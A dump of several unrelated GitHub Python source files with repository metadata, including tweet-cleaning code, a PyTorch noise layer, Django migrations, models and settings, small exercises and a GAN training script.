for k in split_word_i:
word_to_be_replaced = word_to_be_replaced+ " " + k
#print (word_to_be_replaced)
#print (i," should be replaced with ",word_to_be_replaced)
tweet = tweet.replace(i,word_to_be_replaced)
tweet_tokenized = tweet.split()
tweet = ""
for i in tweet_tokenized:
if i is "":
tweet_tokenized.remove("")
for i in tweet_tokenized:
tweet = tweet + i + " "
return tweet
def spell_check(tweet):
tweet_tokenized = tweet.split()
for i in tweet_tokenized:
if not wordnet.synsets(i):
w = spell(i)
print (i," to be replaced with",w)
tweet = tweet.replace("i","w")
return tweet
data['clean_tweet'] = np.vectorize(remove)( "@[\w]*",data['tweet'])
#^[a-zA-Z] means any a-z or A-Z at the start of a line
#[^a-zA-Z] means any character that IS NOT a-z OR A-Z
#deleting anything that does not start with 'a-z' or 'A-Z' or '#'
data['clean_tweet'] = data['clean_tweet'].str.replace("[^a-zA-Z#]", " ")
data['clean_tweet'] = np.vectorize(separate)(data['clean_tweet'])
#data['clean_tweet'] = np.vectorize(stopwords)(data['clean_tweet'])
data['clean_tweet'] = np.vectorize(check)(data['clean_tweet'])
#data['clean_tweet'] = np.vectorize(spell_check)(data['clean_tweet'])
print (len(abb))
'''for i in b:
b.remove("")
'''
data.drop("tweet", inplace=True, axis=1)
data.to_csv("cleaned_data.csv")
print (data.head(10))
"""31123 is for set and 77084 is for list"""
data = pd.read_csv("cleaned_data.csv")
print (data.head(10))
| [
"alcinasharon@gmail.com"
] | alcinasharon@gmail.com |
6c82c194195c99378956636d2ad0b6ad91c129e4 | 32a19c577823baa93e65547814187e8b0dd35941 | /common/noise.py | 8b55012405a45d096d717cb72c36eb8ded955129 | [
"MIT"
] | permissive | wedddy0707/noisyEGG | 77390bc69da8a36bb7ef1a165ec7b018a9806fb2 | 7032d1dae6f2c155f462f54fad541fcf44bf0b5b | refs/heads/main | 2023-05-01T07:12:27.925658 | 2021-05-27T04:18:33 | 2021-05-27T04:18:33 | 332,448,731 | 2 | 0 | MIT | 2021-01-28T02:13:43 | 2021-01-24T12:51:49 | Python | UTF-8 | Python | false | false | 936 | py | # Copyright (c) 2021 Ryo Ueda
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
import torch.nn as nn
class GaussNoise(nn.Module):
def __init__(self, loc, scale):
super(GaussNoise, self).__init__()
self.loc = loc if loc is not None else 0.0
self.scale = scale if scale is not None else 0.0
def forward(self, x):
return x + float(self.training) * (
self.loc + self.scale * torch.randn_like(x).to(x.device)
)
class Noise(nn.Module):
def __init__(
self,
loc=None,
scale=None,
dropout_p=None,
):
super(Noise, self).__init__()
if dropout_p is not None:
self.layer = nn.Dropout(p=dropout_p)
else:
self.layer = GaussNoise(loc=loc, scale=scale)
def forward(self, x):
return self.layer(x)
| [
"ryoryo.ueda@gmail.com"
] | ryoryo.ueda@gmail.com |
77473162ea64a2f5ceb805b1b8e2140bb3078d15 | 0684b94ee5adf6a268115ab7f0a106a053f40503 | /database1/data2/migrations/0001_initial.py | 185cc0796cc2cf1b2b816969f7f807cc9fde6c3a | [] | no_license | shiny-saro/django-ex | 78a6240b3db2cbcd65e04ff9bee6a8a883dad434 | 9cdd88f9459a5184b8ea20b5c132b71a8898d78b | refs/heads/master | 2021-01-01T03:49:05.149565 | 2016-05-04T07:06:38 | 2016-05-04T07:06:38 | 57,967,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-04-22 09:57
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Faculty',
fields=[
('fid', models.CharField(max_length=9, primary_key=True, serialize=False)),
('fname', models.CharField(blank=True, max_length=40, null=True)),
],
options={
'db_table': 'faculty',
'managed': False,
},
),
]
| [
"shinysaro@gmail.com"
] | shinysaro@gmail.com |
efe8e8ebb067601b81a18bc1cf96e4a34bcf3d39 | 99d5b87018e11979dd417fcf40686f92e7ee33ef | /sample/django_wiki/mysite/wiki/models.py | 3319a30c2e9cdf001ee86786babf932f5a111444 | [
"MIT"
] | permissive | william-os4y/fapws2 | 123a0b8cbb8cbe343ee6ab7a8a33f7b5ad664238 | 5752af742b763517ce0a52d0f0c00b40b186edf8 | refs/heads/master | 2020-05-31T08:20:53.247648 | 2008-12-23T13:18:00 | 2008-12-26T14:29:35 | 70,378 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | from django.db import models
from django.conf import settings
class Wikipage(models.Model):
"""Wiki page storage"""
title = models.CharField(maxlength=30)
content = models.TextField()
def editurl(self):
return settings.WIKI_SITEBASE + "edit/" + self.title + "/"
def __repr__(self):
return self.title
class Admin:
list_display=('title',)
| [
"william@opensource4you.com"
] | william@opensource4you.com |
b0fc3c4330eac60491cf98e16081e9edd647a33f | 1d38a0799f8df3639df9e2f295700458abdc1dd4 | /PYTHON/Iniciante/uri-1044-multiplos.py | d037b111ebdd742cd8a992457f25fbc488a8e509 | [] | no_license | wellysonmartins/algoritmos-uri-online-judge | 76df1791b6c8ac7512aa7d2de3a885c5673c9580 | 9f826d797948cb75ec78a2bdc7e91532957620a1 | refs/heads/master | 2020-05-01T07:29:33.155118 | 2019-05-08T14:55:38 | 2019-05-08T14:55:38 | 177,353,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | a, b = map(int, input().split(" "))
if (a%b == 0) or (b%a == 0):
print("Sao Multiplos")
else:
print("Nao sao Multiplos") | [
"wellysonmartins@gmail.com"
] | wellysonmartins@gmail.com |
e3746b822298e3a57d89211a8ed2ce97b16c4ede | b83caaee74dcc633b116cbb080775a2c0f693ddf | /lib/utils/blob.py | 7369dba319ed4084c24a8ddca9e4618df3742f29 | [
"MIT"
] | permissive | Duxiaowey/PsDetection | 30efde5777b9f0ee3920bf6a0cdd2f9811c88f57 | c16204d95f48a83600f7029fcafae531d1aec1d1 | refs/heads/master | 2020-08-09T17:23:46.199666 | 2019-11-19T02:37:36 | 2019-11-19T02:37:36 | 214,132,496 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,931 | py | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Blob helper functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
# 将图片转换为适合网络输入的形式
def im_list_to_blob(ims):
"""Convert a list of images into a network input.
Assumes images are already prepared (means subtracted, BGR order, ...).
"""
max_shape = np.array([im.shape for im in ims]).max(axis=0)
num_images = len(ims)
blob = np.zeros((num_images, max_shape[0], max_shape[1], 3),
dtype=np.float32)
for i in range(num_images):
im = ims[i]
blob[i, 0:im.shape[0], 0:im.shape[1], :] = im
return blob
# 将图片减掉均值后resize为统一尺寸
def prep_im_for_blob(im, pixel_means, target_size, max_size):
"""
Mean subtract and scale an image for use in a blob.
Returns
-------
im: ndarray
im = im - mean
im_scale: float
target_size/im_size_min 或 max_size/im_size_max
"""
im = im.astype(np.float32, copy=False)
im -= pixel_means
im_shape = im.shape
im_size_min = np.min(im_shape[0:2]) # 图片维度的最大值, 如shape=[3,6,2], 则im_size_min=2
im_size_max = np.max(im_shape[0:2]) # 图片维度的最小值, 如shape=[3,6,2], 则im_size_min=6
im_scale = float(target_size) / float(im_size_min)
# Prevent the biggest axis from being more than MAX_SIZE
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale,
interpolation=cv2.INTER_LINEAR)
return im, im_scale
| [
"519780052@qq.com"
] | 519780052@qq.com |
3b3687c87b7098d9ee73292c4d73c5153c10e292 | ba00b7afbb46c3f701a4d812523ae56721ae1db2 | /drf_intro/settings.py | 4edace574e91b17cf199e3add50d43fef9d4e68c | [] | no_license | al-zero/simple-restful-apis | b29e4407550b89f3b0f9895588e3e421e5bdc136 | b80c94fd940990e22e49206fd7e23556c48cff1c | refs/heads/master | 2023-06-22T11:43:11.356389 | 2021-07-25T22:33:50 | 2021-07-25T22:33:50 | 375,231,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,683 | py | """
Django settings for drf_intro project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
#BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nxe3n&5*xbwrd1hl13!xpc#unbyx_i=*)nmk8x&-eu(z==gn!p'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api.apps.ApiConfig',
'api_product.apps.ApiProductConfig',
'api_test.apps.ApiTestConfig',
'api_file_upload.apps.ApiFileUploadConfig',
'api_ecommerce.apps.ApiEcommerceConfig',
'api_notes.apps.ApiNotesConfig',
'api_profile.apps.ApiProfileConfig',
#'api_user_auth.apps.ApiUserAuthConfig',
]
# AUTH_USER_MODEL = "user.CustomUser"
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'drf_intro.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'drf_intro.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'drf_intro_apis',
'USER': 'postgres',
'PASSWORD': 'password',
'HOST': 'localhost',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR + MEDIA_URL
| [
"alphasabawu@gmail.com"
] | alphasabawu@gmail.com |
8cfd790559507720fd1bde192d62cf97c8614046 | 0825ec3de05d9593f3c16a89b7c3434e91680252 | /dataLoad.py | b59d8b72464ac4bb0b724235ebfa365a643f1464 | [] | no_license | dangk89/thesis-project | 9dcd91a43a2a690acbe835749a705770762f62a4 | 97951aca4989d9950a2ad6b962ef8ee410589150 | refs/heads/master | 2020-04-23T14:51:43.019565 | 2019-07-11T08:34:34 | 2019-07-11T08:34:34 | 171,246,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | import json
import os
import pprint
def commentCounter():
count = 0
trump_c = 0
hil_c = 0
ted_c = 0
bern_c = 0
for file in os.listdir('data/'):
with open('data/'+file) as f:
data = json.load(f)
if file[:2] == 'cl':
hil_c += len(data)
elif file[:2] == 'cr':
ted_c += len(data)
elif file[:2] == 'tr':
trump_c += len(data)
elif file[:2] == 'sa':
bern_c += len(data)
count += len(data)
#print(file+'\n'+str(len(data))+'\n')
print('trump: '+str(trump_c))
print('hillary:'+str(hil_c))
print('cruz: '+str(ted_c))
print('bernie: '+str(bern_c))
print('total comments: '+str(count))
#commentCounter()
def submissionCounter():
with open('articles.json') as f:
data = json.load(f)
pretty_dict_str = pprint.pformat(data[0][0])
pprint.pprint(pretty_dict_str)
submissionCounter(
) | [
"dgk89@hotmail.dk"
] | dgk89@hotmail.dk |
23d317072883fe6153f73e21cce080af5f1a7fda | 4f4ac8bb1a3db70bf6582f0320ba4993d23efb99 | /lab-5/solutions/traveler.py | 4b8cf8e35744934f741c55510917b0b9ec199b9a | [] | no_license | letsbrewcode/python-coding-lab | 479f3e5ee76bd33803bb1778347105efc6d19645 | eb90e1ac5f1560fd6170a120ac983e6900bbb183 | refs/heads/master | 2021-05-18T06:31:27.511832 | 2020-09-28T03:16:55 | 2020-09-28T03:16:55 | 251,159,756 | 0 | 1 | null | 2020-06-09T22:38:32 | 2020-03-29T23:58:58 | Python | UTF-8 | Python | false | false | 1,560 | py | # Find end destination of travel route
# Imagine a 2D coordinate system centered at (0,0), You are given the
# route of a traveling point in the form of array. Each item of the array
# contains a direction and distace moved in that direction. Complete the
# function, destination to compute the route and return the final coordinate
# where the point finishes its travel. The answer should be returned in
# the form of a tuple, (x, y)
# Example
# Input = [['N', 1], ['E', 1]]
# Output = (1, 1)
# The point moves 1 unit north and then 1 unit east resulting in the final
# destination as x = 1 and y = 1. It is returned as tuple, (1, 1)
def destination(route):
x, y = 0, 0
for direction, distance in route:
if direction == 'E':
x += distance
continue
if direction == 'W':
x -= distance
continue
if direction == 'N':
y += distance
continue
if direction == 'S':
y -= distance
continue
return x, y
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print('{} got: {} expected: {}'.format(prefix, repr(got), repr(expected)))
if __name__ == '__main__':
route1 = [['E', 2], ['N', 5], ['W', 1]]
route2 = [['E', 4], ['N', 10], ['W', 7], ['S', 7], ['E', 10]]
route3 = [['E', 10], ['N', 10], ['W', 10], ['S', 5], ['S', 5]]
test(destination(route1), (1, 5))
test(destination(route2), (7, 3))
test(destination(route3), (0, 0))
| [
"noreply@github.com"
] | letsbrewcode.noreply@github.com |
cd529db81056cddb2b28783f58bc70f955089bd0 | 4e9ea48452c1a07ae50fadb2c3b4453ef63eb603 | /runs/run23/train.py | 45b42aaf1cffa2ddfa529a2516492385f6be9a15 | [] | no_license | ShinyCode/gan-stronomy | a2b4f087134cc1f4ae187100959793b543f8d751 | 8b100d8416714795374d8788f517fc02e591c66a | refs/heads/master | 2020-04-02T16:08:09.138022 | 2018-12-20T01:50:12 | 2018-12-20T01:50:12 | 154,599,736 | 9 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,730 | py | # Based loosely off https://github.com/eriklindernoren/PyTorch-GAN/blob/master/implementations/cgan/cgan.py
import util
import torch
from torch.autograd import Variable
import torch.optim
import torch.nn
import torch.utils.data
from dataset import GANstronomyDataset
import os
from model import Generator, Discriminator
from PIL import Image
import numpy as np
import opts
from opts import FloatTensor, LongTensor
import shutil
BCELoss = torch.nn.BCELoss()
MSELoss = torch.nn.MSELoss()
def get_img_gen(data, split_index, G, iepoch, out_path):
old_split_index = data.split_index
data.set_split_index(split_index)
data_loader = torch.utils.data.DataLoader(data, batch_size=1, shuffle=False)
data_batch = next(iter(data_loader))
with torch.no_grad():
recipe_ids, recipe_embs, img_ids, imgs, classes = data_batch
batch_size, recipe_embs, imgs, classes, classes_one_hot = util.get_variables(recipe_ids, recipe_embs, img_ids, imgs, classes, data.num_classes())
imgs_gen = G(recipe_embs, classes_one_hot)
save_img(imgs_gen[0], iepoch, out_path, split_index, recipe_ids[0], img_ids[0])
data.set_split_index(old_split_index)
# img_gen is [3, 64, 64]
def save_img(img_gen, iepoch, out_path, split_index, recipe_id, img_id):
filename = '_'.join([opts.TVT_SPLIT_LABELS[split_index], str(iepoch), recipe_id, img_id]) + '.png'
util.save_img(img_gen, out_path, filename)
def print_loss(G_loss, D_loss, iepoch):
print("[%s] Epoch: %d\tG_Loss: %f\tD_Loss: %f" % (util.get_time(), iepoch, G_loss, D_loss))
def save_model(G, G_optimizer, D, D_optimizer, iepoch, out_path):
filename = '_'.join(['model', 'run%d' % opts.RUN_ID, opts.DATASET_NAME, str(iepoch)]) + '.pt'
out_path = os.path.abspath(out_path)
torch.save({
'iepoch': iepoch,
'G_state_dict': G.state_dict(),
'G_optimizer_state_dict': G_optimizer.state_dict(),
'D_state_dict': D.state_dict(),
'D_optimizer_state_dict': D_optimizer.state_dict()
}, os.path.join(out_path, filename))
def load_state_dicts(model_path, G, G_optimizer, D, D_optimizer):
model_path = os.path.abspath(model_path)
saved_model = torch.load(model_path)
G.load_state_dict(saved_model['G_state_dict'])
G_optimizer.load_state_dict(saved_model['G_optimizer_state_dict'])
D.load_state_dict(saved_model['D_state_dict'])
D_optimizer.load_state_dict(saved_model['D_optimizer_state_dict'])
start_iepoch = saved_model['iepoch']
start_ibatch = 1
return start_iepoch, start_ibatch
def main():
# Load the data
data = GANstronomyDataset(opts.DATA_PATH, split=opts.TVT_SPLIT)
data.set_split_index(0)
data_loader = torch.utils.data.DataLoader(data,
batch_size=opts.BATCH_SIZE,
shuffle=True)
num_classes = data.num_classes()
# Make the output directory
util.create_dir(opts.RUN_PATH)
util.create_dir(opts.IMG_OUT_PATH)
util.create_dir(opts.MODEL_OUT_PATH)
# Copy opts.py and model.py to opts.RUN_PATH as a record
shutil.copy2('opts.py', opts.RUN_PATH)
shutil.copy2('model.py', opts.RUN_PATH)
shutil.copy2('train.py', opts.RUN_PATH)
# Instantiate the models
G = Generator(opts.EMBED_SIZE, num_classes).to(opts.DEVICE)
G_optimizer = torch.optim.Adam(G.parameters(), lr=opts.ADAM_LR, betas=opts.ADAM_B)
D = Discriminator(num_classes).to(opts.DEVICE)
D_optimizer = torch.optim.Adam(D.parameters(), lr=opts.ADAM_LR, betas=opts.ADAM_B)
if opts.MODEL_PATH is None:
start_iepoch, start_ibatch = 0, 0
else:
print('Attempting to resume training using model in %s...' % opts.MODEL_PATH)
start_iepoch, start_ibatch = load_state_dicts(opts.MODEL_PATH, G, G_optimizer, D, D_optimizer)
for iepoch in range(opts.NUM_EPOCHS):
for ibatch, data_batch in enumerate(data_loader):
# To try to resume training, just continue if iepoch and ibatch are less than their starts
if iepoch < start_iepoch or (iepoch == start_iepoch and ibatch < start_ibatch):
if iepoch % opts.INTV_PRINT_LOSS == 0 and not ibatch:
print('Skipping epoch %d...' % iepoch)
continue
recipe_ids, recipe_embs, img_ids, imgs, classes = data_batch
# Make sure we're not training on validation or test data!
if opts.SAFETY_MODE:
for recipe_id in recipe_ids:
assert data.get_recipe_split_index(recipe_id) == 0
batch_size, recipe_embs, imgs, classes, classes_one_hot = util.get_variables(recipe_ids, recipe_embs, img_ids, imgs, classes, num_classes)
# Adversarial ground truths
all_real = Variable(FloatTensor(batch_size, 1).fill_(1.0), requires_grad=False).to(opts.DEVICE)
all_fake = Variable(FloatTensor(batch_size, 1).fill_(0.0), requires_grad=False).to(opts.DEVICE)
# Train Generator
for _ in range(opts.NUM_UPDATE_G):
G_optimizer.zero_grad()
imgs_gen = G(recipe_embs, classes_one_hot)
fake_probs = D(imgs_gen, classes_one_hot)
# G_loss = BCELoss(fake_probs, all_real)
G_loss = MSELoss(imgs_gen, imgs)
G_loss.backward()
G_optimizer.step()
# Train Discriminator
for _ in range(opts.NUM_UPDATE_D):
D_optimizer.zero_grad()
fake_probs = D(imgs_gen.detach(), classes_one_hot)
real_probs = D(imgs, classes_one_hot)
D_loss = (BCELoss(fake_probs, all_fake) + BCELoss(real_probs, all_real)) / 2
D_loss.backward()
D_optimizer.step()
if iepoch % opts.INTV_PRINT_LOSS == 0 and not ibatch:
print_loss(G_loss, D_loss, iepoch)
if iepoch % opts.INTV_SAVE_IMG == 0 and not ibatch:
# Save a training image
get_img_gen(data, 0, G, iepoch, opts.IMG_OUT_PATH)
# Save a validation image
get_img_gen(data, 1, G, iepoch, opts.IMG_OUT_PATH)
if iepoch % opts.INTV_SAVE_MODEL == 0 and not ibatch:
print('Saving model...')
save_model(G, G_optimizer, D, D_optimizer, iepoch, opts.MODEL_OUT_PATH)
save_model(G, G_optimizer, D, D_optimizer, 'FINAL', opts.MODEL_OUT_PATH)
if __name__ == '__main__':
main()
| [
"ShinyCode@users.noreply.github.com"
] | ShinyCode@users.noreply.github.com |
bc9e39931d2e0d04546e4d80bc1791a00f18341f | 4374b53176e1ba21034cea9d4723f3464cbf48a6 | /HW_2/Task_C.py | 4934525334765b4c4e52be6017862675be040e24 | [] | no_license | IVyazmin/MADE_algoritms | 8bbf479ee973806e4c9ab6b77f7ecbaa897a657d | a508411f9b7bd0799b3229d52dd7ae19773f312b | refs/heads/master | 2023-01-20T10:44:18.330420 | 2020-11-25T10:22:16 | 2020-11-25T10:22:16 | 295,223,566 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | MAX_VALUE = ord('z') - ord('a') + 1
FIRST_VALUE = ord('a')
row = input()
array = row.split(' ')
array = list(map(int, array))
n = array[0]
m = array[1]
k = array[2]
array = []
for i in range(n):
array.append(input())
for i in range(k):
position = m - i - 1
counters = [0] * MAX_VALUE
new_array = [0] * n
for j in range(n):
element = array[j][position]
counters[ord(element) - FIRST_VALUE] += 1
pos_counters = [0] * MAX_VALUE
for j in range(1, MAX_VALUE):
pos_counters[j] = pos_counters[j - 1] + counters[j - 1]
for j in range(n):
element = array[j][position]
elem_pos = pos_counters[ord(element) - FIRST_VALUE]
new_array[elem_pos] = array[j]
pos_counters[ord(element) - FIRST_VALUE] += 1
array = new_array
for i in range(n):
print(array[i]) | [
"ilja.vyazmin@mail.ru"
] | ilja.vyazmin@mail.ru |
b31d5ea47acb58030e554489eff1c84477515319 | 8d3af0e16bd34b30d87347eacc3defb553dd48d7 | /polls/models.py | a674a3057a1c1e583aa91e63368a7a7311e80013 | [] | no_license | Julie-the-Dragon/mysite | 6adb5ef055c5232c121f3c95bebbb05612c19342 | 8c639070ae9f8b021294817c1bbbb5f6e7192914 | refs/heads/master | 2021-05-10T14:30:47.792748 | 2018-01-22T21:52:25 | 2018-01-22T21:52:25 | 118,519,766 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | import datetime
from django.db import models
from django.utils import timezone
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __str__(self):
return self.question_text
def was_published_recently(self):
return self.pub_date >= timezone.now() - datetime.timedelta(days=1)
def was_published_recently(self):
now = timezone.now()
return now - datetime.timedelta(days=1) <= self.pub_date <= now
was_published_recently.admin_order_field = 'pub_date'
was_published_recently.boolean = True
was_published_recently.short_description = 'Published recently?'
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self):
return self.choice_text
| [
"MSpiridonov94@gmail.com"
] | MSpiridonov94@gmail.com |
ea803f5e3f823ec4e9212f1b9076cd4878c291a9 | 9f54779437e9852d6f83dd46cde17a7ef99922b8 | /python/akg/ops/poly_gpu/add.py | fe9f67a421be41f2cd4fdf7e3035e6631c16cf0c | [
"Apache-2.0",
"Zlib",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | googol-lab/akg | e5424edbdae29aa2841c518edf9a62678581c499 | 4ad0f6a9c44742b54505bdedcd7e64d0ccf79e15 | refs/heads/master | 2023-02-09T20:48:58.770091 | 2021-01-05T09:31:38 | 2021-01-05T09:31:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add"""
import akg
from akg.topi.cuda.injective_single_kernel import schedule_injective
from akg.ops.math_gpu import add
@akg.schedule(schedule_injective)
def add_manual(x, y):
"""Add with manual schedule."""
return add.add(x, y)
def add_auto(x, y):
"""Add with auto poly."""
return add.add(x, y)
| [
"zhangrenwei1@huawei.com"
] | zhangrenwei1@huawei.com |
633981c5580abc6b32852ac0098516780d0c8861 | d9563f113fa4dcbf6dadb5ea186d69839f372119 | /pedidos/migrations/0004_auto_20191129_1821.py | 08c3d750eba80e0bc31f5b96aa8c4b9131fc203e | [] | no_license | CarlosSanz81/serv | 717eefea1ead9325472cef165f2326a14dd355cd | dd3cb5b022b8b939ff6ea502b8335c257d057abb | refs/heads/master | 2020-09-16T03:41:16.306550 | 2019-12-05T12:41:01 | 2019-12-05T12:41:01 | 223,640,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # Generated by Django 2.2.7 on 2019-11-29 17:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pedidos', '0003_archivo'),
]
operations = [
migrations.AlterField(
model_name='archivo',
name='nombre',
field=models.FileField(blank=True, null=True, upload_to='./media/'),
),
]
| [
"carlossanzgarcia81@gmail.com"
] | carlossanzgarcia81@gmail.com |
8a58c1f2b7cf7a7cc75e08c82d835d6ec656f348 | 58391be66d975a196a273cdfd3a7e315b5dcef41 | /train_and_test_svm.py | e6a2231e314567f6debc2bf682d9f79f17579f20 | [] | no_license | szbernat/train_svm | 7ffe3be1a20bd619ce243932637f73075f33a203 | b6325090f73b3d20443e3423c6f2f7e686676177 | refs/heads/main | 2023-01-31T20:28:48.207935 | 2020-12-02T14:49:36 | 2020-12-02T14:49:36 | 317,893,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,775 | py | #!/usr/bin/env python3
import csv
import random
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from itertools import combinations
def make_meshgrid(x, y, h=.02):
x_min, x_max = min(x) - 1, max(x) + 1
y_min, y_max = min(y) - 1, max(y) + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
return xx, yy
data = []
target = []
header = []
with open("iris.csv", "r") as f:
reader = csv.reader(f)
header = next(reader) # Skip data labels
for row in reader:
data.append(list(map(lambda x: float(x), row[:4])))
target.append(int(row[4]))
svm_kernel = 'rbf'
comb = combinations(range(4), 2)
fig, axs = plt.subplots(2,3)
for c, ax in zip(comb, axs.flatten()):
reduced_data = [[row[i] for i in c] for row in data]
x_train,x_test,y_train,y_test = train_test_split(reduced_data, target, test_size=0.30, random_state=1997)
svc = SVC(kernel=svm_kernel)
svc.fit(x_train, y_train)
y_pred = svc.predict(x_test)
accuracy = accuracy_score(y_test, y_pred)*100
# Create plot
x = [row[0] for row in x_test]
y = [row[1] for row in x_test]
xx, yy = make_meshgrid(x,y)
z = svc.predict(np.c_[xx.ravel(), yy.ravel()])
z = z.reshape(xx.shape)
ax.contourf(xx, yy, z, cmap=plt.cm.coolwarm, alpha=0.8)
ax.scatter(x,y,c=y_test, cmap=plt.cm.coolwarm, s=20, edgecolors='k')
ax.set_xlabel(header[c[0]])
ax.set_ylabel(header[c[1]])
ax.set_title(f"Accuracy = {accuracy:5.1f}%")
fig.suptitle(f"SVMs with {svm_kernel} kernel", fontsize=24)
# plt.show()
plt.tight_layout()
plt.savefig(f"{svm_kernel}.png")
| [
"szabobrnt@gmail.com"
] | szabobrnt@gmail.com |
ff7a93b1a6f90c184fbd023f55f0710ae8f08727 | e35ad4af5d578e152c6720e0bf41c12305b0dfdf | /code/project/utils/services.py | fd05543f8ba1363e002f596624bd150e99ffcb1f | [] | no_license | mcgill-a/dissertation | f860eb7d24df3239695d00e8b59cec685cc142df | 89eb1b12643133d32eb17c22537a13f7bbb764c7 | refs/heads/master | 2022-12-12T11:11:32.765319 | 2020-04-26T14:12:32 | 2020-04-26T14:12:32 | 215,106,639 | 0 | 0 | null | 2022-12-08T03:53:32 | 2019-10-14T17:35:20 | TeX | UTF-8 | Python | false | false | 104 | py | from datetime import datetime as dt
def timestamp():
return dt.now().strftime("%Y-%m-%d %H:%M:%S") | [
"40276245@live.napier.ac.uk"
] | 40276245@live.napier.ac.uk |
c92c8e96486ba05e3cf7c3d52836a06125a9a899 | 3d0ae7c8693463faa11bacad8e6ea9d0d70b9eb1 | /nlp/3rdParty/orange/orange/OrangeWidgets/Prototypes/OWPreprocessing.py | 168864c2174450afb47cb0f7ac89fb6b1324b927 | [] | no_license | stefie10/slu_hri | a76f79094bd1740676fec5d889411ba3b1d9dc26 | 50753379953e1ff822162eeab094cffe4a30f3e1 | refs/heads/master | 2022-12-14T01:07:51.522258 | 2020-08-31T00:50:12 | 2020-08-31T00:50:12 | 291,386,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,742 | py | """
<name>Preprocessing</name>
<description>Constructs data preprocessors.</description>
<icon>icons/FeatureConstructor.png</icon>
<priority>11</priority>
